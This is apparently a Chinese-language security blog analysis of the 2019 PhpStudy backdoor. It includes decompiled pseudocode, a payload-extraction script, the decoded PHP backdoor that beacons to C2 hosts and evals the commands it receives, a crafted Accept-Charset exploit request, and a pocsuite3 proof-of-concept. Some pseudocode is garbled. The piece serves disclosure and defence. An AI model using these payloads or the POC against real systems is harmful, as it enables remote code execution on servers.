PhpStudy BackDoor2019 深度分析
PhpStudy BackDoor2019 深度分析
原创: Qftm 合天智汇
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关于《PhpStudyBackDoor》风波已经过去有一段时间了,由于,前段时间一直忙于其它事情QAQ,今天有时间对该事件重新回溯 // edx int v4; // eax int v5; // ecx int v6; // eax int v7; // esi char *v8; // edi char *v9; // ecx int v10; // eax char *v11; // esi int v12; // eax char *v13; // edi char *v14; // ecx _DWORD *v15; // esi int v16; // eax void *v17; // edx int v18; // eax void *v19; // edi _DWORD *v20; // esi int result; // eax int v22; // eax int v23; // ecx int v24; // eax int v25; // edi _DWORD *v26; // esi char v27; // [esp+Dh] [ebp-19Bh] __int16 v28; // [esp+BDh] [ebp-EBh] char v29; // [esp+BFh] [ebp-E9h] char v30; // [esp+C0h] [ebp-E8h] char v31; // [esp+100h] [ebp-A8h] char v32; // [esp+140h] [ebp-68h] char v33; // [esp+180h] [ebp-28h] const char ***v34; // [esp+184h] [ebp-24h] int v35; // [esp+188h] [ebp-20h] int v36; // [esp+18Ch] [ebp-1Ch] int **v37; // [esp+190h] [ebp-18h] int v38; // [esp+194h] [ebp-14h] _DWORD **v39; // [esp+198h] [ebp-10h] void *v40; // [esp+19Ch] [ebp-Ch] char *v41; // [esp+1A0h] [ebp-8h] char *v42; // [esp+1A4h] [ebp-4h] memset( v28 = 0; v3 = *a3; v29 = 0; if ( *(_BYTE *)(*(_DWORD *)(v3 + 4 * core_globals_id - 4) + 210) ) zend_is_auto_global(aServer, 7, a3); zend_hash_find(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 216, aServer, 8, if ( zend_hash_find(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 216, aServer, strlen(aServer) + 1, if ( v40 ) { v4 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4); v5 = *(_DWORD *)(v4 + 296); *(_DWORD *)(v4 + 296) = v35 = v5; v6 = setjmp3( v7 = v35; if ( v6 ) *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v35; else zend_eval_string(v40, 0, *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v7; } } } else { v12 = strcmp(**v34, aCompressGzip); if ( !v12 ) { v13 = v14 = (char *) v42 = v15 = while ( 1 ) { if ( *v15 == 39 ) { v13[v12] = 92; v42[v12 + 1] = *v14; v12 += 2; v15 += 2; } else { v13[v12++] = *v14; ++v15; } v14 += 4; if ( (signed int)v14 >= (signed int) v13 = v42; } spprintf( spprintf( v16 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4); v17 = *(void **)(v16 + 296); *(_DWORD *)(v16 + 296) = v40 = v17; v18 = setjmp3( v19 = v40; if ( v18 ) { v20 = a3; *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v40; } else { v20 = a3; zend_eval_string(v42, 0, } result = 0; *(_DWORD *)(*(_DWORD *)(*v20 + 4 * executor_globals_id - 4) + 296) = v19; return result; } } } if ( dword_10012AB0 - dword_10012AA0 >= dword_1000D010 6000 ) { if ( strlen(byte_100127B8) == 0 ) sub_10004480(byte_100127B8); if ( strlen(Dest) == 0 ) sub_10004380(Dest); if ( strlen(byte_100127EC) == 0 ) sub_100044E0(byte_100127EC); v8 = v9 = asc_1000D028; v41 = v10 = 0; v11 = asc_1000D028; while ( 1 ) { if ( *(_DWORD *)v11 == 39 ) { v8[v10] = 92; v41[v10 + 1] = *v9; v10 += 2; v11 += 8; } else { v8[v10++] = *v9; v11 += 4; } v9 += 4; if ( (signed int)v9 >= (signed int) v8 = v41; } spprintf( v22 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4); v23 = *(_DWORD *)(v22 + 296); *(_DWORD *)(v22 + 296) = v38 = v23; v24 = setjmp3( v25 = v38; if ( v24 ) { v26 = a3; *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v38; } else { v26 = a3; zend_eval_string(v41, 0, } *(_DWORD *)(*(_DWORD *)(*v26 + 4 * executor_globals_id - 4) + 296) = v25; if ( dword_1000D010 3600 ) dword_1000D010 += 3600; ftime( } ftime( if ( dword_10012AA0 0 ) ftime( return 0;}
@eval(%s(',27h,'%s',27h,'));@eval(gzuncompress(',27h,’v42′,27h,')); @eval(gzuncompress(',27h,’v41′,27h,'));ps:eval()函数中第一个%s位格式化字符串、第二个%s为字符串传参
if ( strlen(byte_100127EC) == 0 ) sub_100044E0(byte_100127EC); v8 = v9 = asc_1000D028; v41 = v10 = 0; v11 = asc_1000D028; while ( 1 ) { if ( *(_DWORD *)v11 == 39 ) { v8[v10] = 92; v41[v10 + 1] = *v9; v10 += 2; v11 += 8; } else { v8[v10++] = *v9; v11 += 4; } v9 += 4; if ( (signed int)v9 >= (signed int) v8 = v41; }对v42的处理代码
if ( !v12 ) { v13 = v14 = (char *) v42 = v15 = while ( 1 ) { if ( *v15 == 39 ) { v13[v12] = 92; v42[v12 + 1] = *v14; v12 += 2; v15 += 2; } else { v13[v12++] = *v14; ++v15; } v14 += 4; if ( (signed int)v14 >= (signed int) v13 = v42; }分析代码可知v41数据内容是1000D028-1000D66C(基地址为10000000)范围内的数据,v42数据内容是1000D66C-1000E5**(基地址为10000000)范围内的数据,使用010edit查看发现其均位于.data数据块
# -*- coding:utf-8 -*- # !/usr/bin/env python import os, sys, string, shutil, re import base64 import struct import pefile import ctypes import zlib # import put_family_c2 def hexdump(src, length=16): FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)]) lines = [] for c in xrange(0, len(src), length): chars = src[c:c + length] hex = ' '.join(["%02x" % ord(x) for x in chars]) printable = ''.join(["%s" % ((ord(x) = 127 and FILTER[ord(x)]) or '.') for x in chars]) lines.append("%04x %-*s %s\n" % (c, length * 3, hex, printable)) return ''.join(lines) def descrypt(data): try: # data = base64.encodestring(data) # print(hexdump(data)) num = 0 data = zlib.decompress(data) # return result return (True, result) except Exception, e: print(e) return (False, "") def GetSectionData(pe, Section): try: ep = Section.VirtualAddress ep_ava = Section.VirtualAddress + pe.OPTIONAL_HEADER.ImageBase data = pe.get_memory_mapped_image()[ep:ep + Section.Misc_VirtualSize] # print(hexdump(data)) return data except Exception, e: return None def GetSecsions(PE): try: for section in PE.sections: # print(hexdump(section.Name)) if (section.Name.replace('\x00', '') == '.data'): data = GetSectionData(PE, section) # print(hexdump(data)) return (True, data) return (False, "") except Exception, e: return (False, "") def get_encodedata(filename): pe = pefile.PE(filename) (ret, data) = GetSecsions(pe) if ret: flag = "gzuncompress" offset = data.find(flag) data = data[offset + 0x10:offset + 0x10 + 0x567 * 4].replace("\x00\x00\x00", "") decodedata_1 = zlib.decompress(data[:0x191]) print(hexdump(data[0x191:])) decodedata_2 = zlib.decompress(data[0x191:]) with open("decode_1.txt", "w") as hwrite: hwrite.write(decodedata_1) hwrite.close with open("decode_2.txt", "w") as hwrite: hwrite.write(decodedata_2) hwrite.close def main(path): c2s = [] domains = [] file_list = os.listdir(path) for f in file_list: print f file_path = os.path.join(path, f) get_encodedata(file_path) if __name__ == "__main__": # os.getcwd() path = "php5.4.45" main(path)运行结果生成两个数据文件分别对应v41、v42,查看数据内容是经过base64编码过的,对其解码
@ini_set("display_errors","0"); error_reporting(0); $h = $_SERVER['HTTP_HOST']; $p = $_SERVER['SERVER_PORT']; $fp = fsockopen($h, $p, $errno, $errstr, 5); if (!$fp) { } else { $out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n"; $out .= "Host: {$h}\r\n"; $out .= "Accept-Encoding: compress,gzip\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); fclose($fp); }v41脚本:使用fsockopen模拟GET发包
@ini_set("display_errors","0"); error_reporting(0); function tcpGet($sendMsg = '', $ip = '', $port = '20123'){ $result = ""; $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,10); if( !$handle ){ $handle = fsockopen($ip, intval($port), $errno, $errstr, 5); if( !$handle ){ return "err"; } } fwrite($handle, $sendMsg."\n"); while(!feof($handle)){ stream_set_timeout($handle, 2); $result .= fread($handle, 1024); $info = stream_get_meta_data($handle); if ($info['timed_out']) { break; } } fclose($handle); return $result; } $ds = array("www","bbs","cms","down","up","file","ftp"); $ps = array("20123","40125","8080","80","53"); $n = false; do { $n = false; foreach ($ds as $d){ $b = false; foreach ($ps as $p){ $result = tcpGet($i,$d."",$p); if ($result != "err"){ $b =true; break; } } if ($b)break; } $info = explode("^>",$result); if (count($info)==4){ if (strpos($info[3],"/*Onemore*/") !== false){ $info[3] = str_replace("/*Onemore*/","",$info[3]); $n=true; } @eval(base64_decode($info[3])); } }while($n);v42脚本:后门c2服务器(当前c2已经失活,因此不会对相关被控主机造成新的危害)ps:从上面v41、v42数据的提取过程,可以发现攻击者对数据进行了压缩存储,增加了恶意代码的隐蔽性,同时c2服务器域名模仿了奇虎360公司相关产品名称,具有一定的欺诈特性。
v12 = strcmp(**v34, aCompressGzip); // //compress,gzip if ( !v12 ) { v13 = v14 = (char *) v42 = v15 = while ( 1 ) { if ( *v15 == 39 ) { v13[v12] = 92; v42[v12 + 1] = *v14; v12 += 2; v15 += 2; } else { v13[v12++] = *v14; ++v15; } v14 += 4; if ( (signed int)v14 >= (signed int) v13 = v42; } spprintf( spprintf( v16 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4); v17 = *(void **)(v16 + 296);分析代码逻辑,首先想要执行
spprintf(必须满足if( !v12 )
v12 = strcmp(**v34, aCompressGzip);if ( !v12 )定位aCompressGzip,只要ACCEPT_ENCODING等于compress,gzip即可出发v42恶意代码
GET / HTTP/1.1Host: x.x.x.x…..Accept-Encoding:compress,gzip….ps:由于C2服务器已经失效,不在进行后续操作
if ( zend_hash_find(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 216, aServer, strlen(aServer) + 1, if ( v40 ) { v4 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4); v5 = *(_DWORD *)(v4 + 296); *(_DWORD *)(v4 + 296) = v35 = v5; v6 = setjmp3( v7 = v35; if ( v6 ) *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v35; else zend_eval_string(v40, 0, *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v7; } } }分析代码逻辑
第一个if(),判断是否存在HTTP_ACCEPT_ENCODING字段,$_SERVER['HTTP_ACCEPT_ENCODING'] 为当前请求的Accept-Encoding:头部信息的内容。
最后,在前三个if()的基础上,提取HTTP_ACCEPT_CHARSET字段值,并对该值进行base64解码,然后调用zend_eval_string(v40,0, 执行RCE。
GET / HTTP/1.1Host: x.x.x.x…..Accept-Encoding: gzip,deflateAccept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==….EXP利用
GET /phpinfo.php HTTP/1.1Host: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip,deflateAccept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==Connection: closeUpgrade-Insecure-Requests: 1exp利用
c3lzdGVtKCJuZXQgdXNlciIpOw== system("net user");POC构造
import base64import hashlibimport randomimport urllibfrom urllib.parse import urljoin, quotefrom pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, get_listener_ip, get_listener_portfrom pocsuite3.api import requestsfrom import loggerfrom pocsuite3.lib.utils import get_middle_text class DemoPOC(POCBase): vulID = '93212' # ssvid version = '1.0' author = ['Qftm'] vulDate = '2019-09-23' createDate = '2019-09-23' updateDate = '2019-09-23' references = [''] name = 'phpstudy backdoor' appPowerLink = ' ' appName = 'phpstudy' appVersion = 'version = 2018|2016' vulType = 'backdoor' desc = '''Phpstudy Backdoor RCE''' samples = [] install_requires = [''] category = POC_CATEGORY.EXPLOITS.WEBAPP def _verify(self): result = {} try: vul_url = urljoin(self.url, '/') rand_num = random.randint(0, 1000) hash_flag = hashlib.md5(str(rand_num).encode()).hexdigest() print(vul_url) prexp = '''echo '{}' ;'''.format(hash_flag) exp = base64.b64encode(prexp.encode()).decode() headers = {'Accept-Encoding': 'gzip,deflate', 'Accept-Charset': '{}'.format(exp) } r =, headers=headers) if r.status_code != 404: if hash_flag in r.text: print(r.headers.get("Location")) result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url except Exception as ex: logger.exception(ex) return self.parse_output(result) def _attack(self): result = {} return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else:'target is not vulnerable') return output register_poc(DemoPOC)漏洞验证机制使用随机数产生的MD5值(hash_flag)进行校验,首先判断网页是否是404提高命中率,然后根据网页返回来的内容,比对查看是否包含相应的hash_flag,如果包含则证明存在后门RCE,否则不存在。